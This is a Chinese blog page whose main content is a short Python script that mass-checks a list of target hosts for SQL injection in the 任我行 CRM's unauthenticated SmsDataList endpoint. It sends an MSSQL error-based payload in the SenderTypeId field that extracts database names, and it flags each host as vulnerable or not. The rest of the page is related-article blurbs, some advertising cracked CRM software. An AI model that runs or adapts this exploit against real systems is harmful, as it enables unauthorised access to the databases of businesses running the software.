任我行-CRM SQL注入

最新推荐文章于 2024-07-25 23:12:39 发布
最新推荐文章于 2024-07-25 23:12:39 发布
阅读量136 收藏
点赞数
分类专栏: 自用脚本 文章标签: sql 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44895005/article/details/134107671
版权 
# -*-coding:utf-8 -*-
import requests

with open('任我行-CRM.txt', 'r') as file:
    for line in file:
        line = line.replace('\n', '')
        url = f"{line}/SMS/SmsDataList/?pageIndex=1&pageSize=30"
        headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0",
                   "Accept": "text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2",
                   "Content-type": "application/x-www-form-urlencoded",
                   "Connection": "close"}

        data = {"Keywords": "", "StartSendDate": "2020-06-17", "EndSendDate": "2020-09-17",
                "SenderTypeId": "00000000' AND 8285 IN (SELECT (CHAR(113)+CHAR(112)+CHAR(118)+CHAR(118)+CHAR(113)+(SELECT TOP 1 SUBSTRING((ISNULL(CAST(name AS NVARCHAR(4000)),CHAR(32))),1,1024) FROM master..sysdatabases WHERE ISNULL(CAST(name AS NVARCHAR(4000)),CHAR(32)) NOT IN (SELECT TOP 1 ISNULL(CAST(name AS NVARCHAR(4000)),CHAR(32)) FROM master..sysdatabases ORDER BY name) ORDER BY name)+CHAR(113)+CHAR(118)+CHAR(98)+CHAR(118)+CHAR(113)))-- dVlE"}
        requests.packages.urllib3.disable_warnings()
        response = requests.post(url=url, headers=headers, data=data, verify=False)
        if "qpvvq" in response.text:
            print(f"{line}存在SQL注入")
        else:
            print(f"{line}不存在SQL注入")
Bnessy
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
专栏目录
任我行 CRM SQL注入漏洞复现
0xSec
08-13 1836
任我行CRM(Customer Relationship Management)是一款专业的企业级CRM软件,旨在帮助企业有效管理客户关系、提升销售效率和提供个性化的客户服务。任我行 CRM SmsDataList 接口处存在SQL注入漏洞,未经身份认证的攻击者可通过该漏洞获取数据库敏感信息及凭证,最终可能导致服务器失陷。
漏洞复现 || 某我行CRM系统SQL注入
失心少年
08-20 276
技术文章仅供参考,任何个人和组织使用网络应当遵守宪法法律,遵守公共秩序,尊重社会公德,不得利用网络从事危害国家安全、荣誉和利益,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他!某任我行 CRM SmsDataList 接口处存在SQL注入漏洞,未经身份认证的攻击者可通过该漏洞获取数据库敏感信息及凭证,SenderTypeId参数存在注入,最终可能导致服务器失陷。
漏洞复现-任我行CRM系统SmsDataList接口SQL注入漏洞(附漏洞检测脚本)
jjjj1029056414的博客
01-04 527
漏洞复现-任我行CRM系统SmsDataList接口SQL注入漏洞,附带自己写的poc脚本
开源ERP源码ASP.NET
资源收集
12-02 550
链接:https://pan.baidu.com/s/16Dzrff8wytC4Si-oOq29Zw 提取码:1212 功能较全,但是没用实体类也没用orm,就整天用DataSet,二次开发估计够呛,代码没啥参考价值
【1day】复现任我行协同CRM存在SQL注入漏洞
记录并分享学习安全的知识点..
08-14 630
任我行CRMCRM(客户关系管理)、OA(自动化办公)、OM(目标管理)、KM(知识管理)、HR(人力资源)一体化的企业管理软件。通过建立组织运营管理铁三角(目标行动-企业文化-知识复制),一切围绕以客户为中心的全方位、透明化业务管理(市场-销售-生产-服务),打造企业组织高效协同的运营管理平台。任我行协同CRM存在SQL注入漏洞,远程未授权攻击者可利用此漏洞获取敏感信息,进一步利用可能获取目标系统权限。
任我行CRM系统存在 SQL注入漏洞[2023-HW]
holyxp的博客
08-16 1035
任我行CRM(Customer Relationship Management)是一款专业的企业级CRM软件,旨在帮助企业有效管理客户关系、提升销售效率和提供个性化的客户服务。任我行 CRM SmsDataList 接口处存在SQL注入漏洞,未经身份认证的攻击者可通过该漏洞获取数据库敏感信息及凭证,最终可能导致服务器失陷。
任我行协同CRM最新版10.21以上
07-13
"任我行协同CRM最新版10.21以上"是一款专为企业打造的客户关系管理(CRM)系统,集成了协同办公(OA)功能,旨在提高企业效率,优化业务流程。该版本号10.21SP1及以上,表明产品在不断迭代升级,确保用户能享受到最新的...
任我行协同CRM10.1破解版下载,附微信对接说明和帮我把语句
01-20
任我行协同CRM10.1破解版下载,附微信对接说明和帮我把语句
任我行crm6.2破解
10-04
任我行crm6.2破解第一步,安装6.2原版文件,我安装的是管家婆CRM软件6.2 STM版本安装包 第二步: 停止IIS服务,在命令提示符下,输入 net stop w3svc 第三步:下载破解文件并解压缩,有4个文件,acecrm.dll;...
任我行协同CRM-企业运营管理平台6.1
04-27
"任我行协同CRM-企业运营管理平台6.1"是一款专为企业设计的客户关系管理(CRM)系统,它集成了多种功能,旨在提升企业的运营效率和客户满意度。该系统允许企业在内部进行有效的协同工作,从而优化业务流程,提高销售...
SQL进阶:解锁高级特性,深化数据洞察
WayneYalejk的博客
07-24 435
掌握了SQL的基础知识后,进一步探索其高级特性将帮助您更高效地处理复杂数据,深化数据分析的广度和深度。本文将带您领略SQL的高级功能,包括窗口函数、存储过程、触发器以及高级查询技巧等,让您在数据处理的道路上更进一步。通过这两篇文章,读者可以从SQL的基础知识逐步深入到高级特性,全面掌握SQL在数据处理和分析中的强大能力。
SQL核心基础语法—快速入门MySQL
goldfish8848的博客
07-25 559
MySQL其实是DBMS软件系统,也就是说MySQL并不是一个数据库,这是很多人的误区。我们经常听到的Oracle,MySQL,微软SQL Server,都是DBMS软件系统,我们只是通过这些系统来管理和维护数据库而已,DBMS相当于用户和数据库之间的桥梁。目前有超过300种不同的DBMS系统,我们今天要学习的MySQL是关系型数据库,关系型数据库的数据存储模型很像Excel,用行和列组织数据。操作关系型的DBMS系统,大多数都是用SQL来管理数据,学会了SQL,就相当于学会了这些DBMS的核心。
spring —— 事务管理器
最新发布
firstgrass的博客
07-25 600
事务管理主要针对数据源进行操作:在数据库方面,通过 TransactionManager 事务管理器进行管理,表明一旦出现错误,该数据源的所有数据全部复原。那么数据库如何判断是否发生了错误呢?这就需要在代码方面,通过 @Transactional 注解管理相应的方法,表示一旦该方法出现错误,那么由该方法调用的数据就要执行回滚。
数据库实验:SQL Server创建数据库及基本表
sherry__yuzu的博客
07-24 310
1、掌握使用SQL SERVER Management Studio工具连接数据库引擎;2、掌握使用CREATE TABLE 创建基本表的用法;3、掌握使用ALTER TABLE 修改基本表的用法;4、掌握使用DROP TABLE删除基本表的用法;
sqlalchemy使用json_unquote函数的mysql like查询
ithongchou的博客
07-23 1355
为您自己的数据库连接信息,并根据实际表结构修改模型类。函数查询MySQL JSON字段可以通过使用。下面是一个示例,假设有一个名为。请确保替换示例代码中的数据库连接字符串(在SQLAlchemy中使用。的表,其中包含一个名为。
使用sqlalchemy查询mysql的JSON字段
ithongchou的博客
07-23 207
首先,你需要定义一个与表格对应的模型类。
会Excel就会sql
svygh123的专栏
07-20 1159
以上就是通过具体的例子来说明Excel中对应的操作,以便更好地对比SQL,通过这些步骤,你可以直观地在Excel中实现类似数据库操作的功能,SQL就像是数据库世界的Excel,但它更加强大,适用于大规模数据处理和复杂的数据关系管理。虽然开始时可能会觉得SQL语法有些抽象,但一旦掌握了基础,你会发现它非常高效且强大,特别是在处理大量数据和执行复杂查询时。就像在Excel中一样,实践中学习SQL会更加有效,尝试编写一些简单的查询,逐渐增加难度,你会很快上手的!
任我行协同CRM9.2操作指南
协同CRM9.2是任我行信息技术有限公司推出的一款集成CRM(客户关系管理)、OA(办公自动化)、OM(运营管理)和KM(知识管理)于一体的软件系统,旨在提升企业的整体运营效率和管理水平。本说明书详细介绍了该系统的...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Bnessy

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值